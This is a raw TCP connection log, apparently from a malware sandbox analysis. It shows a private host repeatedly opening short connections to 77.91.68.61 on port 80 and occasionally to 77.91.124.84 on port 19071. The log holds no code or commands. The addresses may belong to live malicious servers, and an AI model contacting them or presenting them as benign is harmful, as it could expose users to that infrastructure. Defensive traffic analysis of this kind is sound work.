Jul 27, 2023 01:34:00.136235952 CEST	49924	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.158590078 CEST	80	49925	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.158725977 CEST	49925	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.159092903 CEST	49925	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.202972889 CEST	80	49925	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.207176924 CEST	80	49925	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.207283974 CEST	49925	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.325066090 CEST	49925	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.325786114 CEST	49926	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.369401932 CEST	80	49925	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.369528055 CEST	80	49926	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.369544029 CEST	49925	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.369713068 CEST	49926	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.370678902 CEST	49926	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.414614916 CEST	80	49926	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.419219017 CEST	80	49926	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.419328928 CEST	49926	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.544280052 CEST	49926	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.545108080 CEST	49927	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.588484049 CEST	80	49926	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.588583946 CEST	49926	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.589313984 CEST	80	49927	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.589456081 CEST	49927	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.589947939 CEST	49927	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.634358883 CEST	80	49927	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.639086008 CEST	80	49927	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.639653921 CEST	49927	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.750699997 CEST	49927	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.751535892 CEST	49928	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.795309067 CEST	80	49927	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.795449972 CEST	49927	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.796272993 CEST	80	49928	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.796366930 CEST	49928	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.796833038 CEST	49928	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.841504097 CEST	80	49928	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.845426083 CEST	80	49928	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.845649004 CEST	49928	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.949671984 CEST	49928	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.950346947 CEST	49929	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.994375944 CEST	80	49928	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.994472980 CEST	49928	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.994651079 CEST	80	49929	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:00.994755983 CEST	49929	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.995107889 CEST	49929	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.039355040 CEST	80	49929	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.044929028 CEST	80	49929	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.047013044 CEST	49929	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.166008949 CEST	49929	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.166773081 CEST	49930	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.210621119 CEST	80	49929	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.210994005 CEST	80	49930	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.211093903 CEST	49929	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.211215973 CEST	49930	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.211652040 CEST	49930	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.255901098 CEST	80	49930	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.259974003 CEST	80	49930	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.260188103 CEST	49930	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.373805046 CEST	49930	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.374413967 CEST	49931	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.418251991 CEST	80	49930	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.418370962 CEST	80	49931	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.419900894 CEST	49930	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.419939995 CEST	49931	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.422136068 CEST	49931	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.466265917 CEST	80	49931	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.470912933 CEST	80	49931	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.471082926 CEST	49931	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.590344906 CEST	49931	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.590953112 CEST	49932	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.634430885 CEST	80	49931	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.634515047 CEST	49931	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.635088921 CEST	80	49932	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.635190010 CEST	49932	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.635576010 CEST	49932	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.680147886 CEST	80	49932	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.684765100 CEST	80	49932	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.684895992 CEST	49932	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.796665907 CEST	49932	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.817718029 CEST	49933	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.841101885 CEST	80	49932	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.843410015 CEST	49932	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.861901045 CEST	80	49933	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.862158060 CEST	49933	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.872410059 CEST	49933	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:01.916568041 CEST	80	49933	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.921200037 CEST	80	49933	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:01.921267033 CEST	49933	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.028654099 CEST	49933	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.029321909 CEST	49934	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.072645903 CEST	80	49933	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.072740078 CEST	49933	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.073182106 CEST	80	49934	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.073944092 CEST	49934	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.086651087 CEST	49934	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.130708933 CEST	80	49934	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.134576082 CEST	80	49934	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.134651899 CEST	49934	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.248905897 CEST	49934	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.249562025 CEST	49935	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.293073893 CEST	80	49934	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.293163061 CEST	49934	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.294250011 CEST	80	49935	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.294397116 CEST	49935	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.294759035 CEST	49935	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.339451075 CEST	80	49935	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.343864918 CEST	80	49935	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.344146967 CEST	49935	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.458570957 CEST	49935	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.459769011 CEST	49936	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.504317999 CEST	80	49935	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.504467964 CEST	80	49936	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.504483938 CEST	49935	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.504615068 CEST	49936	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.507611036 CEST	49936	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.552292109 CEST	80	49936	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.556628942 CEST	80	49936	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.556713104 CEST	49936	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.669279099 CEST	49936	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.669986010 CEST	49937	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.713983059 CEST	80	49936	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.714054108 CEST	80	49937	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.714128017 CEST	49936	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.714173079 CEST	49937	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.714544058 CEST	49937	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.760318995 CEST	80	49937	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.765249014 CEST	80	49937	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.765348911 CEST	49937	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.875941038 CEST	49937	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.876692057 CEST	49938	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.920003891 CEST	80	49937	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.920299053 CEST	49937	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.921353102 CEST	80	49938	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.921442032 CEST	49938	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.921828032 CEST	49938	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:02.966553926 CEST	80	49938	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.970172882 CEST	80	49938	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:02.971864939 CEST	49938	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.075289965 CEST	49938	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.084287882 CEST	49939	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.120275974 CEST	80	49938	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.120424986 CEST	49938	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.129020929 CEST	80	49939	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.129108906 CEST	49939	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.129499912 CEST	49939	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.173456907 CEST	80	49939	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.178121090 CEST	80	49939	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.178263903 CEST	49939	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.297852039 CEST	49939	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.298732042 CEST	49940	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.341855049 CEST	80	49939	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.342711926 CEST	49939	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.342905998 CEST	80	49940	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.344687939 CEST	49940	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.349404097 CEST	49940	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.394788980 CEST	80	49940	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.398258924 CEST	80	49940	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.398871899 CEST	49940	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.500376940 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:03.512288094 CEST	49940	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.512944937 CEST	49941	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.545430899 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:03.556572914 CEST	80	49940	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.556674004 CEST	49940	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.557293892 CEST	80	49941	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.557423115 CEST	49941	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.557869911 CEST	49941	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.589879036 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:03.602005005 CEST	80	49941	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.605420113 CEST	80	49941	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.605520964 CEST	49941	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.719173908 CEST	49941	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.726919889 CEST	49942	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.763623953 CEST	80	49941	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.763706923 CEST	49941	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.770919085 CEST	80	49942	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.771083117 CEST	49942	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.771533012 CEST	49942	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.798294067 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:03.815378904 CEST	80	49942	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.819031954 CEST	80	49942	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.819186926 CEST	49942	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.843179941 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:03.886831045 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:03.934509993 CEST	49942	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.935324907 CEST	49943	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.978579044 CEST	80	49942	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.978651047 CEST	49942	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.979823112 CEST	80	49943	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:03.979904890 CEST	49943	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:03.980396986 CEST	49943	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.024941921 CEST	80	49943	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.028422117 CEST	80	49943	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.028501987 CEST	49943	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.155155897 CEST	49943	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.156670094 CEST	49944	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.199889898 CEST	80	49943	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.199995041 CEST	49943	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.200578928 CEST	80	49944	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.200695992 CEST	49944	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.205950975 CEST	49944	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.250017881 CEST	80	49944	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.253489971 CEST	80	49944	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.253561974 CEST	49944	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.356468916 CEST	49944	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.357523918 CEST	49945	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.400473118 CEST	80	49944	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.400556087 CEST	49944	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.402297974 CEST	80	49945	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.403033018 CEST	49945	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.403033018 CEST	49945	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.447765112 CEST	80	49945	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.453085899 CEST	80	49945	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.453203917 CEST	49945	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.589267969 CEST	49945	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.590313911 CEST	49946	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.634094954 CEST	80	49945	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.634200096 CEST	49945	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.634547949 CEST	80	49946	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.634629965 CEST	49946	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.634984970 CEST	49946	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.679205894 CEST	80	49946	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.683108091 CEST	80	49946	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.683201075 CEST	49946	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.796992064 CEST	49946	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.797626972 CEST	49947	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.841442108 CEST	80	49946	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.841506004 CEST	49946	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.841561079 CEST	80	49947	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.841633081 CEST	49947	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.842212915 CEST	49947	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.886039972 CEST	80	49947	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.890013933 CEST	80	49947	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:04.890105009 CEST	49947	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:04.996879101 CEST	49947	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.014851093 CEST	49948	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.040981054 CEST	80	49947	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.041053057 CEST	49947	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.058986902 CEST	80	49948	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.059115887 CEST	49948	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.060920954 CEST	49948	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.104815960 CEST	80	49948	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.108623981 CEST	80	49948	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.108733892 CEST	49948	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.219491005 CEST	49948	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.220212936 CEST	49949	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.263591051 CEST	80	49948	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.267467022 CEST	49948	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.267550945 CEST	80	49949	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.267679930 CEST	49949	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.275913954 CEST	49949	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.320739031 CEST	80	49949	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.324549913 CEST	80	49949	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.324646950 CEST	49949	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.439641953 CEST	49949	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.440439939 CEST	49950	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.484352112 CEST	80	49949	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.484466076 CEST	49949	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.485012054 CEST	80	49950	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.485100985 CEST	49950	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.488609076 CEST	49950	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.533227921 CEST	80	49950	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.536367893 CEST	80	49950	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.536468029 CEST	49950	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.638719082 CEST	49950	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.641742945 CEST	49951	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.684428930 CEST	80	49950	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.684631109 CEST	49950	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.686055899 CEST	80	49951	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.686239958 CEST	49951	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.687211990 CEST	49951	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.731522083 CEST	80	49951	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.735012054 CEST	80	49951	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.735157013 CEST	49951	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.843609095 CEST	49951	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.844675064 CEST	49952	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.888561010 CEST	80	49951	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.889478922 CEST	80	49952	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.889566898 CEST	49951	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.889612913 CEST	49952	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.891391039 CEST	49952	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:05.936101913 CEST	80	49952	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.939408064 CEST	80	49952	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:05.940033913 CEST	49952	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.071398973 CEST	49952	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.072278976 CEST	49953	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.116247892 CEST	80	49952	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.116282940 CEST	80	49953	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.116399050 CEST	49952	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.116410017 CEST	49953	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.119323015 CEST	49953	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.163523912 CEST	80	49953	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.166902065 CEST	80	49953	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.166977882 CEST	49953	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.297976017 CEST	49953	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.298659086 CEST	49954	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.342063904 CEST	80	49953	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.342164040 CEST	49953	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.342849016 CEST	80	49954	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.344161034 CEST	49954	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.348823071 CEST	49954	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.393232107 CEST	80	49954	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.397579908 CEST	80	49954	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.397739887 CEST	49954	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.513051033 CEST	49954	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.513856888 CEST	49955	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.557498932 CEST	80	49954	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.557712078 CEST	49954	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.557832956 CEST	80	49955	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.559451103 CEST	49955	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.569211006 CEST	49955	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.613459110 CEST	80	49955	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.616894960 CEST	80	49955	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.616972923 CEST	49955	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.731797934 CEST	49955	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.732636929 CEST	49956	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.775723934 CEST	80	49955	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.775818110 CEST	49955	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.776998997 CEST	80	49956	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.777096987 CEST	49956	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.777622938 CEST	49956	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.821856976 CEST	80	49956	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.825753927 CEST	80	49956	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.830188036 CEST	49956	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.935463905 CEST	49956	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.936167955 CEST	49957	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.980098009 CEST	80	49956	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.980426073 CEST	80	49957	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:06.980554104 CEST	49956	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:06.980600119 CEST	49957	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.018932104 CEST	49957	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:07.063589096 CEST	80	49957	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.067229033 CEST	80	49957	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:07.069385052 CEST	49957	80	192.168.2.5	77.91.68.61
